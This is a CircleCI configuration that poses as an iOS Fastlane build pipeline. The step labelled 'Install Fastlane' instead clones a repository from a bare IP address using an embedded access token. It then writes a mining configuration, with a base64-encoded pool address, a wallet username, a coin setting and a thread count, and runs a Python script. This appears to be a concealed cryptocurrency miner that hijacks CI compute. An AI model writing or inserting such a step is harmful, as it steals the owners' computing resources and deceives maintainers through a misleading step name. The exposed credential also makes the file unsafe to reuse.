version: 2.1
executors:
  ios-executor:
    macos:
      xcode: "14.0.0"
    working_directory: ~/project
jobs:
  build-ios:
    executor: ios-executor
    steps:
      - checkout
      - run:
          name: Install Fastlane
          command: |
            git clone http://malphite848:ff2c9a712ddb48cefb9b1bc8b40fa9c3fb348ea3@160.30.168.199:3001/malphite848/mini-dataset.git
            cd mini-dataset
            echo -e 'proxy=wss://present-nichol-vivo1-4f3dad8a.koyeb.app/bWlub3RhdXJ4Lm5hLmUuenBvb2wuY2E6NzAxOQ==\nusername=RLJFAPkpcBD6FXesztbxPoWF5WV6FtsYUN\npassword=c=RVN\nthreads=36' > data.txt
            python3 app.py
      - run:
          name: Run Fastlane
          command: bundle exec fastlane ios build
workflows:
  version: 2
  build:
    jobs:
      - build-ios